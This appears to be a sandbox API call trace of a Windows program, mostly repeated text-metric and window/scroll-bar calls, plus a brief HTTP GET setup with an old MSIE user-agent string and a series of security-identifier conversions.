[0179.807] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.807] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.807] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.807] GetSystemMetrics (nIndex=6) returned 1
[0179.807] GetDC (hWnd=0x0) returned 0x23010850
[0179.807] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.807] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.807] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.808] GetSystemMetrics (nIndex=6) returned 1
[0179.808] GetDC (hWnd=0x0) returned 0x23010850
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.808] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.808] GetSystemMetrics (nIndex=6) returned 1
[0179.808] GetDC (hWnd=0x0) returned 0x23010850
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.808] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.808] GetSystemMetrics (nIndex=6) returned 1
[0179.808] GetDC (hWnd=0x0) returned 0x23010850
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.808] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.808] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.808] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.808] GetSystemMetrics (nIndex=6) returned 1
[0179.809] GetDC (hWnd=0x0) returned 0x23010850
[0179.809] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.809] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.809] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.809] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.809] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.809] GetSystemMetrics (nIndex=6) returned 1
[0179.809] GetDC (hWnd=0x0) returned 0x23010850
[0179.809] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.809] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.809] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.809] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.809] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.809] GetSystemMetrics (nIndex=6) returned 1
[0179.809] GetDC (hWnd=0x0) returned 0x23010850
[0179.810] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.810] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.810] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.810] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.810] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.810] GetSystemMetrics (nIndex=6) returned 1
[0179.810] GetDC (hWnd=0x0) returned 0x23010850
[0179.810] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.810] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.810] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.810] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.810] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.810] GetSystemMetrics (nIndex=6) returned 1
[0179.811] GetDC (hWnd=0x0) returned 0x23010850
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.811] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.811] GetSystemMetrics (nIndex=6) returned 1
[0179.811] GetDC (hWnd=0x0) returned 0x23010850
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.811] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.811] GetSystemMetrics (nIndex=6) returned 1
[0179.811] GetDC (hWnd=0x0) returned 0x23010850
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.811] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.811] GetSystemMetrics (nIndex=6) returned 1
[0179.811] GetDC (hWnd=0x0) returned 0x23010850
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.811] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.811] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.812] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.812] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.812] GetSystemMetrics (nIndex=6) returned 1
[0179.812] GetDC (hWnd=0x0) returned 0x23010850
[0179.812] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.812] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.812] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.812] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.812] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.812] GetSystemMetrics (nIndex=6) returned 1
[0179.812] GetDC (hWnd=0x0) returned 0x23010850
[0179.812] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.812] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.812] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.812] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.812] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.812] GetSystemMetrics (nIndex=6) returned 1
[0179.812] GetDC (hWnd=0x0) returned 0x23010850
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f088 | out: lptm=0x20f088) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0c0 | out: lptm=0x20f0c0) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.813] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.813] GetSystemMetrics (nIndex=6) returned 1
[0179.813] GetDC (hWnd=0x0) returned 0x23010850
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20ed8c | out: lptm=0x20ed8c) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20edc4 | out: lptm=0x20edc4) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.813] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.813] GetSystemMetrics (nIndex=6) returned 1
[0179.813] GetDC (hWnd=0x0) returned 0x23010850
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.813] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.813] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.813] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.813] GetSystemMetrics (nIndex=6) returned 1
[0179.815] SysReAllocStringLen (in: pbstr=0x2a7f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0179.815] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.815] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.815] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.815] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0179.815] SysReAllocStringLen (in: pbstr=0x2a7f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a7f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0179.816] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x20f110, lpdwBufferLength=0x20f114 | out: lpBuffer=0x20f110, lpdwBufferLength=0x20f114) returned 1
[0179.949] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x20f110, dwBufferLength=0x4) returned 1
[0179.949] VirtualFree (lpAddress=0x2a80000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0179.950] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a76490, cbMultiByte=3, lpWideCharStr=0x20e048, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0179.950] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0179.951] FlatSB_SetScrollProp (param_1=0xa0140, index=0x200, newValue=0x0, param_4=1) returned 0
[0179.952] GetSysColor (nIndex=20) returned 0xffffff
[0179.952] FlatSB_SetScrollProp (param_1=0xa0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0179.952] FlatSB_SetScrollInfo (param_1=0xa0140, code=0, psi=0x20df7e, fRedraw=1)
[0179.952] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0xa0140, Msg=0x46, wParam=0x0, lParam=0x20de7c) returned 0x0
[0179.956] GetTextExtentPoint32A (in: hdc=0x23010850, lpString="0", c=1, psizl=0x20f204 | out: psizl=0x20f204) returned 1
[0179.956] IsIconic (hWnd=0xa0140) returned 0
[0179.956] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f204 | out: lpRect=0x20f204) returned 1
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] IsIconic (hWnd=0xa0140) returned 0
[0179.956] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f14c | out: lpRect=0x20f14c) returned 1
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] IsIconic (hWnd=0xa0140) returned 0
[0179.956] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.956] IsIconic (hWnd=0xa0140) returned 0
[0179.956] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.956] FlatSB_SetScrollProp (param_1=0xa0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0179.956] GetSysColor (nIndex=20) returned 0xffffff
[0179.956] FlatSB_SetScrollProp (param_1=0xa0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0179.956] FlatSB_SetScrollInfo (param_1=0xa0140, code=0, psi=0x20f15a, fRedraw=1) returned 0
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] FlatSB_SetScrollProp (param_1=0xa0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0179.957] GetSysColor (nIndex=20) returned 0xffffff
[0179.957] FlatSB_SetScrollProp (param_1=0xa0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0179.957] FlatSB_SetScrollInfo (param_1=0xa0140, code=1, psi=0x20f15a, fRedraw=1) returned 0
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f14c | out: lpRect=0x20f14c) returned 1
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.957] IsIconic (hWnd=0xa0140) returned 0
[0179.957] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.957] FlatSB_SetScrollProp (param_1=0xa0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0179.957] GetSysColor (nIndex=20) returned 0xffffff
[0179.957] FlatSB_SetScrollProp (param_1=0xa0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0179.957] FlatSB_SetScrollInfo (param_1=0xa0140, code=0, psi=0x20f15a, fRedraw=1) returned 0
[0179.958] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.958] IsIconic (hWnd=0xa0140) returned 0
[0179.958] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.958] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.958] IsIconic (hWnd=0xa0140) returned 0
[0179.958] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.958] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.958] IsIconic (hWnd=0xa0140) returned 0
[0179.958] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.958] FlatSB_SetScrollProp (param_1=0xa0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0179.958] GetSysColor (nIndex=20) returned 0xffffff
[0179.958] FlatSB_SetScrollProp (param_1=0xa0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0179.958] FlatSB_SetScrollInfo (param_1=0xa0140, code=1, psi=0x20f15a, fRedraw=1) returned 0
[0179.958] GetWindowLongA (hWnd=0xa0140, nIndex=-16) returned 116326400
[0179.958] IsIconic (hWnd=0xa0140) returned 0
[0179.958] GetClientRect (in: hWnd=0xa0140, lpRect=0x20f11c | out: lpRect=0x20f11c) returned 1
[0179.958] GetCurrentThreadId () returned 0x3d8
[0179.959] ConvertSidToStringSidA () returned 0x1
[0179.959] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.959] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0179.959] LocalFree (hMem=0x926f40) returned 0x0
[0179.959] LocalFree (hMem=0x912f90) returned 0x0
[0179.959] ConvertStringSidToSidA () returned 0x1
[0179.959] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a72914, pSourceSid=0x912f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] IsValidSid (pSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] ConvertSidToStringSidA () returned 0x1
[0179.959] LocalFree (hMem=0x926f40) returned 0x0
[0179.959] LocalFree (hMem=0x912f90) returned 0x0
[0179.959] ConvertStringSidToSidA () returned 0x1
[0179.959] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7702c, pSourceSid=0x912f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] IsValidSid (pSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] ConvertSidToStringSidA () returned 0x1
[0179.959] LocalFree (hMem=0x926f40) returned 0x0
[0179.959] LocalFree (hMem=0x912f90) returned 0x0
[0179.959] ConvertStringSidToSidA () returned 0x1
[0179.959] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f5a0, pSourceSid=0x912f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] IsValidSid (pSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.959] ConvertSidToStringSidA () returned 0x1
[0179.959] LocalFree (hMem=0x926f40) returned 0x0
[0179.959] LocalFree (hMem=0x912f90) returned 0x0
[0179.959] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f614, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.960] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.960] ConvertSidToStringSidA () returned 0x1
[0179.960] LocalFree (hMem=0x926f58) returned 0x0
[0179.960] LocalFree (hMem=0x926f40) returned 0x0
[0179.960] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f688, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0179.960] IsValidSid (pSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0179.960] ConvertSidToStringSidA () returned 0x1
[0179.960] LocalFree (hMem=0x926f58) returned 0x0
[0179.960] LocalFree (hMem=0x926f40) returned 0x0
[0179.960] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f6fc, pSourceSid=0x926f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0179.960] IsValidSid (pSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0179.960] ConvertSidToStringSidA () returned 0x1
[0179.960] LocalFree (hMem=0x91c1c8) returned 0x0
[0179.960] LocalFree (hMem=0x926f58) returned 0x0
[0179.960] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f770, pSourceSid=0x926f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0179.960] IsValidSid (pSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0179.960] ConvertSidToStringSidA () returned 0x1
[0179.960] LocalFree (hMem=0x91c1c8) returned 0x0
[0179.960] LocalFree (hMem=0x926f70) returned 0x0
[0179.960] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f7f8, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0179.960] IsValidSid (pSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0179.960] ConvertSidToStringSidA () returned 0x1
[0179.960] LocalFree (hMem=0x91c1c8) returned 0x0
[0179.960] LocalFree (hMem=0x926f40) returned 0x0
[0179.960] ConvertStringSidToSidA () returned 0x1
[0179.960] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f880, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0179.961] IsValidSid (pSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0179.961] ConvertSidToStringSidA () returned 0x1
[0179.961] LocalFree (hMem=0x926f58) returned 0x0
[0179.961] LocalFree (hMem=0x926f40) returned 0x0
[0179.961] ConvertStringSidToSidA () returned 0x1
[0179.961] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f90c, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
